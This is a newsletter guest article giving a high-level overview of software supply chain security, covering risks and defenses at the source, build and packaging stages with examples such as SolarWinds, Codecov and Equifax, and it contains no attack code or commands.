An Overview of Software Supply Chain Security
A breakdown of what constitutes the software supply chain and how to secure each stage
[tl;dr sec] Now With More Deep Dives
Hello there! A quick note from me (Clint Gibler), the creator of tl;dr sec.
You may already be familiar with how tl;dr sec is a free weekly newsletter round-up of the best articles, tools, and general cybersecurity research.
But we’re also getting more into long form, deep dive content (like how to securely build product features using AI APIs, a Staff Security Engineer Guide, or how to do a risk analysis of Kubernetes clusters).
This time, I’d like to introduce you to Francis Odum, who will be sharing a two part overview of software supply chain security.
Francis is the author of the software analyst blog. He teaches a cybersecurity & SaaS bootcamp on Maven. He previously led cybersecurity research at the venture capital firm, Contrary, and helped build Contrary Research. Follow him on Twitter @InvestiAnalyst or LinkedIn at Francis Odum.
High-profile attacks such as Microsoft Windows HCP, Solarwinds attack, Kaseya ransomware, and CodeCov attack, Log4shell have raised public awareness of the importance of securing software supply chains.
Software supply-chain (SSC) attacks have existed for many years. However, these large breaches have created more awareness of the importance of securing every aspect of the software development lifecycle.
Gartner predicts that by 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a 3x rise from 2021. Equally, a recent study by Juniper estimates cyberattacks targeting software supply-chain could cost organizations an estimated $81 billion in lost revenue and damages annually by 2026.
This is an issue for enterprises, governments, and developers. SSC has become so critical that it has been driven by the government. The Biden Administration, in its second year in office, released an executive order on SSC risks. This has created a tailwind that has led to a proliferation of companies aiming to protect the supply chain and enable companies to comply with this legislation.
According to data from NightDragon’s software supply chain report, 70% of CISOs said software supply chain is a top investment priority for them in 2023, and over 96% of CISOs said they are using or considering implementing SSC solutions in the next 12 months.
We define software supply chain attacks as those attacks and vulnerabilities that occur during the source, build and package stage of delivering software.
This report is the first of two series exploring software supply chain components. Part 2 is a comprehensive analysis of 12+ SSC vendors and their core differentiators within the software development lifecycle.
This Report In One Minute
Companies are embracing open-source third-party dependencies to ship features to users faster.
Software supply chain security includes using third-party code securely as well as securing the development process from beginning to end.
This report focuses on the following three phases of the software supply chain. Across these phases, we discuss what constitutes software supply chain risks and processes for securing each stage.
Source: This stage constitutes creating the actual code used to build an app. We discuss source code review, managing access to code environments and IDE extensions, and source code management systems (SCM).
Build: This stage compiles and transforms the source code into a deployable form, typically binaries or executable files and includes the CI/CD pipeline. We discuss risk due to dependencies (unintentionally vulnerable, malicious, transitive dependencies, and pipeline dependencies), the CI/CD pipeline, and containers and registries.
Deployment and Package: Bundling software components and dependencies into a deployable format and distributing it for installation on target systems. We discuss Software Bill of Materials (SBOM), code provenance and signatures, and artifact repositories.
By the end of this post, you’ll have a solid overview of the core components of the software supply chain, risks across the chain and how to deploy secure processes at each stage.
If you want to make sure you receive Part 2 of this report, in which we provide a comprehensive analysis of 12+ SSC vendors and their core differentiators, make sure to subscribe to tl;dr sec (if you’re not already), a free weekly update of the best tools, blog posts, and talks in cybersecurity across AppSec, cloud security, AI, supply chain security, and more!
Alright, let’s get into it!
Understanding The Buzz
This proliferation of open-source solutions in enterprises has created an opportunity for attackers to use open-source solutions as a means to inflict harm on companies. For example, known attacks on the software supply in 2022 grew over 633% YoY compared to 2021. There was over 742% average growth in these attacks. Similarly, in 2022, the number of malicious packages has continued to increase significantly, growing to over 88K instances.
Introduction To Software Supply Chain
Supply chain attacks are difficult to manage because of the multiple links, inter-dependencies and processes that make up current software development practices. This report aims to categorize the software supply chain attacks into three broad challenges that need solutions that may be intertwined in between them. These include source, build and deployment and package.
The problem of software supply chain is not entirely new. However, there has been a renewed focus on areas of the software development where traditional software security platforms never captured in the past. Many of the legacy providers missed on the following problems.
First, many of these companies focused on scanning for vulnerabilities within source code. That focus was only on one segment of the development lifecycle which created more noise, but never pointed to actionable feedback points for developers. Most of these past solutions focused on source code level compared to understanding the deeper intricacies of dependencies within the build and pipeline stages.
Secondly, many of the legacy players were founded long before the cloud evolved or before open-source became extremely popular amongst developers.
The Rise In Open-Source Software (OSS)
What Defines Software Supply Chain (SSC)
To understand SSC security, we must first define SSC and clear up any misconceptions. SSC involves building and producing software, much like assembling ingredients for a burrito wrap or raw materials for a manufacturing plant. The software supply chain includes all the processes, steps and components you need to create an application. Just like a traditional supply chain where raw materials are sourced, assembled, and transformed into finished goods before they are distributed to retailers or customers. This framework applies to how software supply chain works as well.
Applying it to software development
Modern ways of building applications can be categorized into three phases: source, build, and package stages. Each of these stages could be vulnerable to attackers. During the source stage, developers write custom code. The build stage is responsible for assembling the raw files of source code and transforming them into binaries (output used for deployment). Finally, the deployment and package stage gets the final software ready for deployment to production use.
Just as car manufacturers outsource many parts to suppliers or offshore teams to accelerate production, software development also involves using external tools from suppliers, which are open-source packages and libraries, to accelerate their delivery cadence.
The three most important phases of the software supply chain as it relates to software development are source, build and deployment and package. At a basic level, here are some explanations for each category.
Source: Involves creating the actual code used to build an app. It consists of an assembly of a longer list of components, including custom code, open-source dependencies, publicly hosted code repositories, build and packaging scripts, containers, and more.
Build: The process of compiling and transforming the source code into a deployable form, typically binaries or executable files. Agile has changed how software is developed, and many organizations utilize Continuous Integration (CI)/Continuous Development (CD), a practice for frequently and automatically building, testing, and deploying software changes. Examples include GitHub Actions or GitLab runners.
Deployment and Package: This involves bundling software components and dependencies, like libraries and resources into a deployable format and distributing it for installation on target systems, streamlining application deployment and updates.
Layers of Software Supply Chain Attacks
After building upon a basic understanding of each of these areas, let’s understand how risks can be introduced at each layer.
According to the NIST guide, an SSC attack is when a malicious party tampers with steps, artifacts, or actors within the chain to compromise the consumers of a software artifact down the line. In order to carry out an SSC attack, an attacker needs to subvert, remove, or introduce a step within the SSC process to modify the resulting software product. The chart below shows the various areas where an attacker could launch an attack against the supply chain.
The Supply Chain Levels for Software Artifacts (SLSA) framework is another important framework used to understand each layer of attack. The SLSA (pronounced “salsa”) framework provides a checklist of standards and controls to prevent tampering, improve integrity, and secure open-source packages. SLSA breaks down the three categories (source, build and deployment) into eight distinct types of threats that could occur at each stage.
Using both definitions from the NIST and SLSA framework around the source, build and deployment/package stage. The rest of the report is built around exploring each of these areas in more depth.
The Source Code Layer
The Build and Pipeline Layer
The Packaging and Deployment Layer
Source Code Layer
Source code review
Managing access to code environments and IDE extensions
Source code management systems (SCM)
Source code review
Code is the first and core ingredient in the software supply chain used to build the end product, an application. This code can be developed in-house or from external sources. As code moves across different hands, there are a number of vulnerabilities that occur here.
First, as developers make changes to source code in a version control system (VCS) during code commit, there is always a risk that a bad actor internally could make modifications to the source code or the controls that host them in a code repository. Some of these issues could be resolved with companies implementing code reviews whereby one or more developers analyze a teammate’s code to identify any poorly written code, bugs, or errors. Code changes can be submitted as pull requests (or merge requests), and reviews can be conducted before the changes are merged into the main codebase.
In addition to code reviews, many companies leverage a static application security testing (SAST) tool that continuously scans all new code and existing code for vulnerabilities. You can think of SAST tools, when used properly, as scaling secure code review across every pull request on every code repository.
Historically, companies used heavyweight, legacy SAST tools to try to “find every vulnerability,” leading to large amounts of false positives and heavy operational cost for security teams and/or development teams. Over the past few years, some modern, engineering-focused security teams have been leaning into the concept of “secure defaults” (also called “secure defaults”, or to use Netflix’s term, building a “paved road”). The idea is that the build tools, libraries, and processes make it easy for developers to do things the secure way, and hard to proceed insecurely, thus eliminating entire vulnerability classes from occurring in the first place. See Figma Head of Security Dev Akhawe’s Modern Static Analysis blog post, this Global AppSec SF talk, and this BSidesSF talk for more.
Securing source code management (SCM) systems
Source code leakage has become a major issue, such as the attack in 2022 where Microsoft had its source code leaked by the hacking group Lapsus$. The group alleges they released source code for Bing, Cortana, and other projects stolen from Microsoft's internal Azure DevOps server.
With source code management systems (SCM) like GitHub or GitLab acting as the central hub for the developer’s software development lifecycle, securing these SCMs has become paramount. Developers use these code repositories to store and organize their code while using version control systems like Git to manage and track changes to the source code. By compromising a code repository through unauthorized access, an attacker can gain access to the software’s source code, inject malicious code, hijack credentials, or even provision vulnerable infrastructure.
💡 The Importance of Branch Protection: $3M USD Crypto Heist
Another SSC attack saw over $3M USD stolen in a crypto heist due to an “anonymous contractor” changing the wallet address in the front-end code of a crypto auction site, replacing the authentic wallet address with their own. The studio repo had a procedure to open PRs on the dev branch and go through a review to merge into the master branch. However, this process was not enforced by git branch protection settings.
Managing access to code environments and IDE extensions
Integrated Development Environments (IDEs) and Visual Studio Code (VS Code) like Microsoft’s VS Code have become indispensable tools for developers today. They enable developers to customize their development environments and streamline various aspects of the development process. While IDEs and VS have become popular, developers may unknowingly install malicious extensions like an infected VSCode extension. Some of these extensions could be from open-source packages that rely on dependencies with third-party libraries. Risks could occur when these open-source tools gain access to code repos and compromise the security of the IDE, such as the ability to steal sensitive data or inject malware into a codebase.
The Build & Pipeline Layer
The build stage is responsible for pulling together various code components and transforming the source code that has been compiled into a deployable form, such as binaries, executable files, or code libraries. During this stage, all dependencies, configuration files, and assets are pulled into a distributable form for a target environment.
Across the build pipeline, development teams have to ensure they protect containers and the build automation tools like Apache Maven or GitLab CI/CD. These tools facilitate the building, testing, and deployment of applications. If the build environment is not secure or there are weaknesses in the build scripts, attackers can exploit vulnerabilities in build tools, servers, or the CI/CD pipeline itself to compromise the build process leading to future vulnerabilities in the final software.
Software supply chain attacks could happen during the build stage when the following are incorporated:
Dependencies (Unintentionally vulnerable, malicious, transitive and pipeline)
Containers and registries
Dependencies play a key role across most stages of SDLC, but primarily in the build pipeline stage since they help speed up development of new applications. Dependencies in the context of software supply chain refer to external software components, such as libraries, modules, packages or frameworks that a particular software application or project relies on to function properly.
💡 Examples of dependencies
npm install, npm resolves and fetches these dependencies from the npm registry. It also simplifies the process of updating dependencies. Another example of a third-party dependency includes a package like React-app.
Categories of third-party dependencies
Dependencies are third-party software ‘borrowed’ and downloaded through open-source tools to provide functionality for an application. At a high level, there are two ways third-party dependencies can introduce risk:
Unintentionally vulnerable code
Intentionally malicious code.
Though in both cases, the source of risk is third-party dependencies, how one detects and mitigates these risks is meaningfully different, thus, we’ll discuss them separately. We’ll also provide an in-depth discussion on the importance of SCA tools and their relationship to dependencies.
1) Unintentionally Vulnerable Code
It refers to code within a third-party dependency that contains security vulnerabilities or weaknesses that were not intentionally inserted by the developer of the dependency. These vulnerabilities are often the result of coding errors or poor development practices. They may include issues like buffer overflows, injection vulnerabilities, or incorrect data validation. The industry term for this class of tools is Software Composition Analysis (SCA). SCA plays an integral role in identifying vulnerable dependencies. In part 2 of our report, we provide an extensive discussion on the importance of SCA solutions and their role in preventing vulnerabilities within dependencies.
💡 Famous example: Equifax
The infamous 2017 Equifax data breach is an example of the use of a vulnerable third-party dependency. The company had been using the open-source Apache Struts as its website framework for systems handling credit disputes from consumers, and had failed to update this software with a key security patch after the discovery of a critical exploit in the code. Within two months of the patch’s announcement, hackers had discovered and then used the vulnerability to gain access to Equifax’s internal servers and expose the private records of over 147 million Americans and 15-million British citizens, ultimately costing the company up to $700M.
In some cases, developers may download a library that have vulnerable or malicious transitive dependencies, but may be unaware of the risks because the direct libraries do not explicitly mention them in their configuration files. Some of the biggest complaints security advocates have about the state of SBOMs today is that they still struggle to communicate transitive dependencies related to the enumerated software, which we’ll discuss further in part 2 of this report.
🌶️ Transitive Dependencies: Our Take
While some SCA tools tout their ability to find vulnerable transitive dependencies, we believe this is actually low value.
Actual risk is low. The likelihood that an attacker can provide malicious input that makes its way through your first party code, to the direct dependency, to the vulnerable function in the transitive dependency is quite unlikely in practice. Perhaps for the once-a-year everything-is-on-fire vulnerabilities (like log4shell) there’s risk, but other than that, it’s unlikely.
Difficult to fix. Even if the transitive dependency is exploitable, your remediation options are to try to get fixes into one or both of the dependencies (which you don’t directly control), fork a dependency and patch your own version, or switch to a dependency that provides similar functionality, which may require rewriting a fair amount of your code. None of these are great options.
We note that the risk posed by malicious transitive dependencies is a valid concern (see the event-stream example below), as they are likely written to perform malicious functionality every time, regardless of how the library is used.
2) Malicious Dependencies / Intentionally malicious code
This refers to code that has been intentionally inserted into a third-party dependency with the purpose of compromising the security or functionality of the software using that dependency.
This particular risk has become popular in recent years. This could be perpetrated by hackers with financial motives or nation-states who want to steal company IP, access national secrets, obtain personal information on many individuals (which could later be used for blackmail or espionage), or even preemptively gain the upper hand in future military conflict, for example, gaining privileged access to the electric grid or other industrial control systems.
💡 Intentional, Malicious Code example: event-stream attack
Attackers can use a variety of methods to inject malicious code into the code that defines the build process. These malicious items could be injected into CI scripts, or the build tooling configurations through 3rd party plugins, or tooling binaries. If this happens, the build process itself is compromised and used to distribute malicious code to downstream consumers.
💡 Malicious Code Injected in Pipeline: SolarWinds, CodeCov
In the case of SolarWinds, malicious code was injected into the Orion product build by the perpetrators gaining access to Solarwinds’ build systems. The backdoors were then deployed to roughly 18,000 customers who automatically pulled the malicious updates.
In the Codecov breach, attackers obtained credentials from a Docker image and used them to compromise a Bash Uploader script that many of their customers used in their CI environments.
By being able to run arbitrary code in Codecov customer CI environments, the attackers could access their CI environment variables containing keys, credentials, and tokens that could be used to pivot deeper into the victim’s infrastructure, potentially accessing source code, production data, spin up cryptominers, etc.
A CI/CD (Continuous Integration/Continuous Delivery) pipeline is an automated process that helps software development teams in the build stage to test, and deploy code changes efficiently and consistently. It automates these tasks ensuring that software is continuously updated and delivered to users with minimal manual intervention. CI/CD pipelines use processes called workflows to transform source code to deployable packages in production environments. Popular solutions include GitHub Actions workflows or GitLab Runner.
Although, the goal of CI/CD is to ensure that code changes are thoroughly tested and quickly released to users, developers often make costly mistakes that expose their company to vulnerabilities such as introducing vulnerabilities in 1st party code, third party vulnerability code, or have insecure build systems.
Attackers target CI/CD pipelines to introduce vulnerabilities or malicious code in workflows which can then be deployed to production environments. If build artifacts (compiled code, binaries, or packages) are not properly secured and validated, attackers could tamper with them during the deployment process. Also unauthorized access to CI/CD pipeline can lead to code tampering or unauthorized deployments.
NIST published some guidelines on protecting CI/CD:
Incorporate a range of defensive measures to ensure that attackers cannot tamper with software production processes or introduce malicious software updates (e.g., secure platform for build process).
Ensure the integrity of the CI/CD pipeline artifacts (e.g., repositories) and activities through role definitions and authorizations for actors.
Containers and Registries
Containers play a pivotal role in the software supply chain, particularly in modern application build and deployment workflows. Developers use them to build, test and package their applications in portable ways, so they can work across multiple environments. Developers have also recently faced challenges around many container images having no provenance information, making it difficult to verify where they came from or if someone has tampered with them. Well-intentioned developers sometimes install these packages and run images with known vulnerabilities.
Whether it’s a Docker image or Kubernetes, these solutions have become an indispensable core component of CI/CD pipelines especially for testing in various environments whether in staging or production. Container registries like Docker Hub or Amazon's Elastic Container Registry (ECR) which are centralized locations for storing, distributing and downloading container images have become a key focus for malicious actors. If attackers gain credentials for a registry, they can create and upload malicious container images to public or private registries. Unsuspecting developers may inadvertently use these images in their applications, leading to security breaches.
Developers who want to build containerized applications will generally start by using a base image like Ubuntu or Red Hat OpenShift and consume them from Docker Hub. Attackers can compromise these dependencies, leading to vulnerabilities in the containerized application. For example, as discussed earlier, it was discovered that over 1600 publicly available Docker Hub images were hiding malicious behavior including embedded secrets that could be used as backdoors for attackers.
Finally, it’s important to note that if teams don’t leverage reproducible and deterministic builds that focus on ensuring the process of building software from source code results in identical binary outputs each time, developers may be vulnerable to supply chain attacks. Without using this build protocol, teams run the risk of having malicious actors inject vulnerabilities that lead to misleading binaries. By ensuring that the resulting binaries are consistent and verifiable, these practices enhance trust so the software can be independently verified by third parties to match the claimed source code.
The Packaging & Deployment Layer
The final stages of software development involves bundling the software and its dependencies into a distributable package for deployment into production environments. Alternatively, most cloud-native companies build applications into a container that they then run on some sort of container orchestration platform, like Kubernetes.
Software is packaged into distributable artifacts, which can be in the form of installer packages like Caphyon, container images, or other formats. so it can be easily distributed, deployed, and installed on different systems. At this stage, it’s critical that development teams are able to implement tools that give them clear transparency and integrity into tracing every line of code. This is why we’ve focused on discussing SBOMs and code provenance in this section.
Software supply chain attacks may occur when an attacker tries to tamper with the packaging process such as a yarn package manager to insert malicious code or alter package metadata, leading to compromised software distributions. There are also possible attacks on package mirrors that are running on popular package repos. For example, as part of the CodeCov attacks, leaked credentials were used to upload malicious artifacts to a GCS bucket.
The package and deploy stage covers the following:
Software Bill of Materials (SBOM)
Code provenance and signatures
Software Bill of Materials (SBOM)
Closer to the packaging and deployment stage, teams may use SBOMs to filter for bad dependencies and vulnerabilities either from the source code to the build stage. An SBOM is a machine-readable inventory of software components, build tools and dependencies derived from the use of open source and third-party libraries.
A common analogy is reviewing the list of ingredients on food packaging or determining what is inside a burrito package. An SBOM is meant to provide details on the different components included within a software product: including name, version, license, and vulnerabilities, etc.
SBOM evolved as a result of licensing and infringements against people who would develop proprietary software leveraging open-source, but would not give credits to creators of dependencies they leveraged when building their software. The OWASP CycloneDX and SPDX license list, were developed to create open standardization for SBOMs. However, in 2021 the Biden executive order on the formalization of software supply-chain standards played a key role in the adoption and standards for SBOMs.
SBOM enrichment and aggregation: In recent years, some of the complaints against SBOM include the lack of robustness especially when it comes to keeping up with newer open-source dependencies. Some other issues include how to aggregate and enrich these SBOM artifacts. Lastly, aggregating SBOM information across software portfolios and lines of business will be a growing concern for security leaders. Hence, some organizations create their own SBOMs together with ingesting SBOMs from their vendors. Some organizations add vulnerability exploitability exchange (VEX), a guide that allows developers to know if certain software products are affected by a known vulnerability supplier. SBOM providers will generally integrate this into their solution as it serves as a companion. SBOMs only provide you with a list of components within software, but might not detect ‘known’ vulnerable risks which are exploitable.
Alternatively, OpenSSF Scorecard, an automated scanning tool can perform a number of checks on the security posture of an open source project (e.g. is it using security tools like SAST or fuzzing, does it follow build pipeline best practices like requiring code reviews and uses branch protection, etc.) for contextualizing and enriching SBOMs.
Code provenance and signatures
Without knowing the origin of code components, it's challenging to verify the integrity of software. Code from unknown sources may have poor quality, lack documentation, or vulnerabilities leading to software defects and reliability issues. This is where code provenance plays a critical role.
Code provenance allows developers to trace the origin and history of a piece of code or software component, including its authorship, modifications, and any intermediaries it passed through during its development lifecycle. Essentially, it's about knowing where your code comes from and understanding its journey from inception to deployment. In the context of the software supply chain, code provenance is crucial for security, traceability and verifying the integrity of code. It helps ensure that the code you incorporate into your software is trustworthy and hasn't been tampered with or compromised by malicious actors. Heavily regulated industries like financial or healthcare sectors have to adopt these software for compliance requirements.
Code signatures and signing are increasingly becoming the best practice for ensuring the integrity of code. As developers commit and deploy software over its lifecycle, code signing certificates are a favored target for software supply chain attackers. Solutions like Sigstore sign & verification have become standards for ensuring supply chain integrity both across developers and users. There are code-signing vendors such as Garantir, CircleCI, GitHub Cosign, and Venafi.
Artifacts in software development refer to the output of a build process, such as compiled code, libraries, or executable files. An artifacts repository, like Jfrog is a centralized storage location that securely stores and manages these artifacts. Their role is to provide a reliable and organized way to store, version, and distribute software components, making it easier for developers to collaborate, build, and deploy software.
In the software supply chain, artifacts and artifacts Repositories play a crucial role in version control, dependency management, and in ensuring builds are reproducible. They ensure that software components are consistently built, tested, and delivered to ensure a streamlined deployment process.
Software supply chain attacks generally occur if an artifact repo is not properly secured and unauthorized users gain access to tamper with artifacts. Attackers might inject malware into artifacts, especially if the repository lacks proper scanning and validation mechanisms. If artifacts are not treated as immutable (unchangeable), it's possible for them to be altered after they are stored in the repository.
Part 2 of the SSC Overview: Vendor Analysis
Many of the software supply chain vendors look similar on their websites or how people view them. However, each of them are approaching the SSC problem from a different angle or core competency.
We have analyzed over 12+ software supply chain vendors. In Part 2 of our SSC report, we provide a detailed analysis of each of the key software supply chain vendors.
To make sure you see Part 2 when it’s published, make sure to subscribe to tl;dr sec, a free weekly update of the best tools, blog posts, and talks in cybersecurity across AppSec, cloud security, AI, supply chain security, and more!